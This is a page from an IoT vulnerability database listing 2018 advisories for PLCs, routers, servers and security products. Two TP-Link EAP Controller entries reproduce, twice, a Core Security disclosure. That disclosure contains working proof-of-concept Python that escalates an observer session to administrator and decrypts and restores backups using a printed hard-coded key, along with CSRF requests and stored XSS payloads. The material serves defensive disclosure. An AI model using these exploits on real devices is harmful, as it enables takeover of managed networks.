VARIoT IoT vulnerabilities database


VAR-201805-1198 No CVE MAC1100 PLC has a remote control vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The MAC1100 PLC Programmable Logic Controller (PLC) is a product of the Dalian Controller (DCCE) programmable logic controller (PLC) family. A remote control vulnerability exists in the MAC1100 PLC. An attacker can use the vulnerability to directly start and stop the PLC remotely, which affects the normal operation of the controller.
VAR-201805-1197 No CVE Tencent T920 PLC Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The T-920 Programmable Logic Controller (PLC) is one of the products of the China TENGCONTROL TECHNOLOGY T9 series of programmable logic controllers (PLC). The company's products are widely used in important industrial control sites such as tobacco, petrochemical and water utilities. The Tencent T920 PLC has a denial of service vulnerability. An attacker can use the vulnerability to construct a specific network data packet that causes the TENGCONTROL T-920 CPU to deny service during communication. The CPU enters a failure mode, which affects the normal operation of the controller.
VAR-201805-0171 CVE-2017-3775 plural Lenovo System Product BIOS Authentication vulnerability CVSS V2: 6.9
CVSS V3: 6.4
Severity: MEDIUM
Some Lenovo System x server BIOS/UEFI versions, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code. Multiple Lenovo System products' BIOS contain an authentication vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Lenovo Flex System x240 M5 and other models are Lenovo server products. Multiple Lenovo System x servers are prone to a local authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks.
VAR-201805-0944 CVE-2018-8865 Lantech IDS 2102 Buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
In Lantech IDS 2102 2.0 and prior, a stack-based buffer overflow vulnerability has been identified which may allow remote code execution. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Lantech IDS 2102 contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The Lantech IDS 2102 is an Ethernet device server. A remote attacker could exploit the vulnerability to execute code. Lantech IDS 2102 is prone to the following multiple security vulnerabilities: 1. A stack-based buffer-overflow vulnerability 2. Failed exploit attempts will likely cause a denial-of-service condition.
VAR-201805-0947 CVE-2018-8869 Lantech IDS 2102 Input validation vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
In Lantech IDS 2102 2.0 and prior, nearly all input fields allow for arbitrary input on the device. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Lantech IDS 2102 contains an input validation vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The Lantech IDS 2102 is an Ethernet device server. An input validation vulnerability exists in Lantech IDS 2102 2.0 and earlier. A remote attacker can exploit the vulnerability to execute arbitrary code by constructing malicious input. Lantech IDS 2102 is prone to the following multiple security vulnerabilities: 1. A stack-based buffer-overflow vulnerability 2. Failed exploit attempts will likely cause a denial-of-service condition.
VAR-201805-0337 CVE-2018-10713 D-Link DSL-3782 EU Buffer error vulnerability CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'read' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'read <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The D-Link DSL-3782 is a wireless router product from D-Link. A security vulnerability exists in the D-Link DSL-3782 EU 1.01 release.
VAR-201805-0734 CVE-2018-1239 Dell EMC Unity Operating Environment In OS Command injection vulnerability CVSS V2: 9.0
CVSS V3: 7.2
Severity: HIGH
Dell EMC Unity Operating Environment (OE) versions prior to 4.3.0.1522077968 are affected by multiple OS command injection vulnerabilities. A remote application admin user could potentially exploit the vulnerabilities to execute arbitrary OS commands as system root on the system where Dell EMC Unity is installed. Multiple Dell EMC products are prone to multiple remote command-injection vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Customers can refer to Dell EMC target code information at: https://support.emc.com/docu39695_Target_Revisions_and_Adoption_Rates.pdf?language=en_US&language=en_US

Link to remedies: Registered Dell EMC Support customers can download Dell EMC Unity software from the Dell EMC Online Support web site: https://support.emc.com/downloads/39949_Dell-EMC-Unity-Family

Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867. For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action.

The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
VAR-201805-0359 CVE-2018-10165 TP-Link EAP Controller and Omada Controller Vulnerable to cross-site scripting CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
Stored Cross-site scripting (XSS) vulnerability in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows allows authenticated attackers to inject arbitrary web script or HTML via the userName parameter in the local user creation functionality. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller contain a cross-site scripting vulnerability. Information may be obtained and information may be altered.

1. A privilege-escalation vulnerability
2. A hard-coded cryptographic key vulnerability
3. A cross-site request-forgery vulnerability
4. Multiple HTML-injection vulnerabilities

An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

1. **Advisory Information**

Title: TP-Link EAP Controller Multiple Vulnerabilities
Advisory ID: CORE-2018-0001
Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities
Date published: 2018-05-03
Date of last update: 2018-04-17
Vendors contacted: TP-Link
Release mode: Coordinated release

2. **Vulnerability Information**

Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164

3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Due to the use of a hard-coded cryptographic key, the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection, and finally, two stored Cross Site Scripting vulnerabilities were found.

4. **Vulnerable Packages**

. TP-Link EAP Controller_V2.5.4_Windows
. TP-Link Omada Controller_V2.6.0_Windows

Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**

TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues.

6. **Credits**

This vulnerability was discovered and researched by Julián Muñoz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team.

7. **Technical Description / Proof of Concept Code**

TP-Link EAP Controller doesn't have any role control on the Web app API; only the application GUI seems to restrict low-level users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low-privilege user (observer) can make a request and create a new administrator user. In 7.2 we show that the software uses a hard-coded key to encrypt the Web application's backup file. An attacker possessing such a key and knowing the encryption algorithm could decrypt and modify the backup file. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. In 7.3 we show that the application does not have any Cross-Site Request Forgery protection, giving an attacker the possibility of forcing an end user to execute unwanted actions on the EAP Controller in which the victim is currently authenticated.

7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168]

The software does not control privileges on the usage of the Web API, allowing a low-privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user):

/-----
import requests

session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"  #observer session_id
cookie = {'TPEAP_SESSIONID': tpeap_session_id}
data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"}

#create user
create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False)
-----/

The roleId parameter can be discovered in 7.2 by decrypting the backup file.

7.2. **Download, Decrypt and Restore the web app backup file** [CVE-2018-10167]

As described, the whole Web API does not restrict low-privilege users, so an observer can make a request to download the web app backup file. The following XML is part of the decrypted backup file; modifying those fields would give us control over the EAP device, since we can inject a user and password for the user account and enable SSH on the device. With this we can connect remotely to the access point via SSH with the given credentials.

/-----
<useraccount>
{
  "id" : "5a09fad8bb62eef169069ad3",
  "userName" : "attacker",
  "password" : "1234567",
  "site" : "Default",
  "key" : "userAccount"
}
</useraccount>
<ssh>
{
  "id" : "59fb411fbb62eef169069ac7",
  "sshserverPort" : 22,
  "sshenable" : true,
  "site" : "Default",
  "key" : "ssh"
}
</ssh>
-----/

The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server.

/-----
# -*- coding: utf-8 -*-
import requests
import codecs

key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \
      "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \
      "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX"


def init_key(secret_key):
    key_in_bytes = map(ord, secret_key)
    number_list = range(0, 256)
    j = 0
    for i, val in enumerate(number_list):
        j = j + number_list[i] + key_in_bytes[i] & 0xFF
        temp = number_list[i]
        number_list[i] = number_list[j]
        number_list[j] = temp
    return number_list


def encrypt(data, key):
    key = init_key(key)
    input = [x for x in data]
    output = []
    for x, elem in enumerate(data):
        i = 0
        j = 0
        i = (i + 1) % 256
        j = (j + key[i]) % 256
        temp = key[i]
        key[i] = key[j]
        key[j] = temp
        t = (key[i] + key[j] % 256) % 256
        iY = key[t]
        iCY = iY
        output.append(chr(ord(input[x]) ^ iCY))
    ret = ''.join(output)
    return ret


session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"
cookie = {'TPEAP_SESSIONID': tpeap_session_id}

#get backup file
get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False)

#decrypt backup file
decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key)

#modify decrypted backup file
patched_backup = decrypted_backup.replace('normaluser', 'attacker')

#encrypt the file and save it
path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg"
encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape')
h = codecs.open(path_to_write, "w", encoding='utf-8')
h.write(encrypt_patched_backup)
h.close()

#upload patched backup file
files = {'file': open(path_to_write, 'rb')}
restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False)
-----/

7.3. **Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166]

There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain.

Proof of concept to create an Administrator User:

/-----
POST /user/addUser HTTP/1.1
Host: EAP_CONTROLER_IP:8043
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5000/xss
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa
Connection: close
Upgrade-Insecure-Requests: 1

name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator
-----/

7.4. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164]

The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB). In the following example we encode "<script>alert(1)</script>" in base64; the result is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==", so we replace the fileData with the code and restore the backup file.

/-----
<picturefiles>
  <file>
    <fileId>5a383b962dc07622f0bdc101</fileId>
    <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData>
  </file>
</picturefiles>
-----/

To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example).

8. **Report Timeline**

2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send the draft advisory.
2018-01-14: TP-Link answered asking for the advisory in clear text.
2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form.
2018-01-29: TP-Link informed Core Security that they had checked the draft advisory and were going to fix the vulnerabilities.
2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and requested an estimated release date for the fix.
2018-02-07: TP-Link informed that they were working on a beta version of the fix and would provide it to Core Security for testing.
2018-02-07: Core Security thanked TP-Link for their answer and asked for a tentative date for this beta version.
2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix.
2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again.
2018-03-01: Core Security thanked TP-Link for their answer and requested regular contact till the release of the fixed version.
2018-03-19: Core Security requested a status update.
2018-03-21: TP-Link confirmed that the new version would be available in early April.
2018-03-26: Core Security thanked TP-Link for their reply and asked for a solidified release date.
2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities.
2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed.
2018-04-17: Core Security set the release date to be May 3rd at 12 PM EST.

9. **References**

[1] https://www.tp-link.com/en/products/details/EAP-Controller.html
[2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com

12. **Disclaimer**

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201805-0358 CVE-2018-10164 TP-Link EAP Controller and Omada Controller Vulnerable to cross-site scripting CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
Stored Cross-site scripting (XSS) vulnerability in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows allows authenticated attackers to inject arbitrary web script or HTML via the implementation of portalPictureUpload functionality. This is fixed in version 2.6.1_Windows. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerability An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. **Advisory Information** Title: TP-Link EAP Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0001 Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities Date published: 2018-05-03 Date of last update: 2018-04-17 Vendors contacted: TP-Link Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164 3. It allows you to centrally manage your EAP devices using a Web browser. Vulnerabilities were found in the EAP Controller management software, allowing privilege escalation due to improper privilege management in the Web application. Due to the use of a hard-coded cryptographic key the backup file of the Web application can be decrypted, modified and restored back. 
Also, the Web application does not have Cross-Site Request Forgery protection and finally, two stored Cross Site Scripting vulnerabilities were found. 4. **Vulnerable Packages** . TP-Link EAP Controller_V2.5.4_Windows . TP-Link Omada Controller_V2.6.0_Windows Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues. 6. **Credits** This vulnerability was discovered and researched by Julian MuA+-oz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** TP-Link EAP Controller doesn't have any role control on the Web app API, only the application GUI seems to be restricting low lever users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. On 7.2 we show the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing such key, and knowing the encryption algorithm would allow the backup file to be decrypted and modified. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. On 7.3 we show the application does not have any Cross-Site Request Forgery Protection giving an attacker the possibility of forcing an end user to execute any unwanted actions on the EAP Controller in which the victim is currently authenticated. Finally, we discovered two Cross-Site Scripting, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5). 7.1. 
**Privilege escalation from Observer to Administrator** [CVE-2018-10168] The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user): /----- import requests session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" #observer session_id cookie = {'TPEAP_SESSIONID': tpeap_session_id} data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"} #create user create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False) -----/ The roleId parameter can be discovered in 7.2 by decrypting the backup file. 7.2.**Download, Decrypt and Restore the web app backup file** [CVE-2018-10167] As described, the whole Web API do not restrict low privilege users, so an observer can make a request to download the web app backup file. The following xml is part of the decrypted backup file, modifying those fields would give us control over the EAP device since we can inject a user and password for the user account and enable SSH on the device. With this we can connect remotely to the access point via SSH with the given credentials. /----- <useraccount> { "id" : "5a09fad8bb62eef169069ad3", "userName" : "attacker", "password" : "1234567", "site" : "Default", "key" : "userAccount" } </useraccount> <ssh> { "id" : "59fb411fbb62eef169069ac7", "sshserverPort" : 22, "sshenable" : true, "site" : "Default", "key" : "ssh" } </ssh> -----/ The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server. 
/----- # -*- coding: utf-8 -*- import requests import codecs key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \ "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \ "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX" def init_key(secret_key): key_in_bytes = map(ord, secret_key) number_list = range(0, 256) j = 0 for i, val in enumerate(number_list): j = j + number_list[i] + key_in_bytes[i] & 0xFF temp = number_list[i] number_list[i] = number_list[j] number_list[j] = temp return number_list def encrypt(data, key): key = init_key(key) input = [x for x in data] output = [] for x, elem in enumerate(data): i = 0 j = 0 i = (i + 1) % 256 j = (j + key[i]) % 256 temp = key[i] key[i] = key[j] key[j] = temp t = (key[i] + key[j] % 256) % 256 iY = key[t] iCY = iY output.append(chr(ord(input[x]) ^ iCY)) ret = ''.join(output) return ret session = requests.Session() session.trust_env = False tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa" cookie = {'TPEAP_SESSIONID': tpeap_session_id} #get backup file get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False) #decrypt backup file decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key) #modify decrypted backup file patched_backup = decrypted_backup.replace('normaluser', 'attacker') #encrypt the file and save it path_to_write = r"C:\fake_path\patched_backup_from_observer.cfg" encrypt_patched_backup = unicode(encrypt(patched_backup, key), 'unicode-escape') h = codecs.open(path_to_write, "w", encoding='utf-8') h.write(encrypt_patched_backup) h.close() #upload patched backup file files = {'file': open(path_to_write, 'rb')} restore_backup_response = session.post('https://EAP_CONTROLER_IP:8043/globalsetting/restore', files=files, cookies=cookie, verify=False) -----/ 7.3. 
**Lack of Cross-Site Request Forgery Protection** [CVE-2018-10166] There are no Anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attack-controlled domain. Proof of concept to create an Administrator User /----- POST /user/addUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en; TPEAP_SESSIONID=80ab613a-590c-47ac-a2d6-f2949a0e9daa Connection: close Upgrade-Insecure-Requests: 1 name=testuser&email=testuser%40gmail.com&roleId=59fb411ebb62eef169069ac3&password=123456&roleName=administrator -----/ 7.4. **Cross-Site Scripting in the creation of a local User** [CVE-2018-10165] The following parameter of the local user creation is vulnerable to a stored Cross Site Scripting: userName The following is a proof of concept to demonstrate the vulnerability: /----- POST /hotspot/localUser/saveUser HTTP/1.1 Host: EAP_CONTROLER_IP:8043 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5000/xss Content-Type: application/x-www-form-urlencoded Content-Length: 64 Cookie: TPEAP_LANGUAGE=en Connection: close Upgrade-Insecure-Requests: 1 userName=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=123456 -----/ 7.5. **Cross-Site Scripting in portalPictureUpload** [CVE-2018-10164] The implementation of portalPictureUpload can be abused and leads to a stored Cross Site Scripting. 
Decrypting the backup file shows that the portal background image is uploaded encoded in base64 and stored in the software database (mongoDB) In the following example we encode "<script>alert(1)</script>" in base64, the results is "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" so we replace the fileData with the code and restore the backup file. /----- <picturefiles> <file> <fileId>5a383b962dc07622f0bdc101</fileId> <fileData>PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</fileData> </file> </picturefiles> -----/ To execute the stored XSS we enter the page https://EAP_CONTROLER_IP:8043/globalsetting/portalPictureLoad?fileId=5a383b962dc07622f0bdc101 (using the fileId used in the example). 8. **Report Timeline** 2018-01-12: Core Security sent an initial notification to TP-LINK, asking for GPG keys in order to send draft advisory. 2018-01-14: TP-Link answered asking for the advisory in clear text. 2018-01-15: Core Security sent the draft advisory to TP-Link in clear text form. 2018-01-29: TP-Link informed Core Security they checked the draft advisory and they are going to fix the vulnerabilities. 2018-01-29: Core Security asked if all the reported vulnerabilities were confirmed and request an estimated release date for the fix. 2018-02-07: TP-Link informed that they were working in a beta version of the fix and they will provide it to Core Security for test. 2018-02-07: Core Security thanked TP-Link's answer and asked for a tentative date for this beta version. 2018-02-19: Core Security tested the beta version and verified that all the vulnerabilities were fixed. Also, Core Security asked for a tentative release date for the fix. 2018-02-27: Core Security asked for a status update again. However, this version didn't address the reported vulnerabilities. Core Security asked for a status update again. 2018-03-01: Core Security thanked TP-Link's answer and requested for a regular contact till the release of the fixed version. 2018-03-19: Core Security requested a status update. 
2018-03-21: TP-Link confirmed that the new version will be available in early April.
2018-03-26: Core Security thanked TP-Link for the reply and asked for a solidified release date.
2018-04-13: Core Security noticed that a new version of the EAP Controller was released (v2.6.1) and asked TP-Link if this version fixed the reported vulnerabilities.
2018-04-16: Core Security tested the new release and confirmed that the reported vulnerabilities were addressed.
2018-04-17: Core Security set the release date to May 3rd at 12 PM EST.

9. **References**

[1] https://www.tp-link.com/en/products/details/EAP-Controller.html
[2] https://www.tp-link.com/en/download/EAP-Controller.html#Controller_Software

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide the actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions.
Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, the Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of the Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-201805-0271 CVE-2018-10350 Trend Micro Smart Protection Server SQL Injection Vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A SQL injection remote code execution vulnerability in Trend Micro Smart Protection Server (Standalone) 3.x could allow a remote attacker to execute arbitrary code on vulnerable installations due to a flaw within the handling of parameters provided to wcs_bwlists_handler.php. Authentication is required in order to exploit this vulnerability. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to remotely execute code under the context of webserv. A SQL injection vulnerability exists in Trend Micro Smart Protection Server (Standalone) 3.x, caused by the program failing to properly validate user-submitted strings before building SQL queries from them. Exploiting this issue could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or cause a denial-of-service condition
VAR-201805-0902 CVE-2018-6237 Trend Micro Smart Protection Server Vulnerable to resource exhaustion CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability in Trend Micro Smart Protection Server (Standalone) 3.x could allow an unauthenticated remote attacker to manipulate the product to send a large number of specially crafted HTTP requests to potentially cause the file system to fill up, eventually causing a denial of service (DoS) situation. Trend Micro Smart Protection Server (Standalone) contains a resource exhaustion vulnerability. The product may be put into a denial-of-service (DoS) state. A security vulnerability exists in Trend Micro Smart Protection Server (Standalone) 3.x. Exploiting this issue could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or cause a denial-of-service condition
VAR-201805-0506 CVE-2018-0234 Cisco Aironet Access Point Input validation vulnerability CVSS V2: 7.8
CVSS V3: 8.6
Severity: HIGH
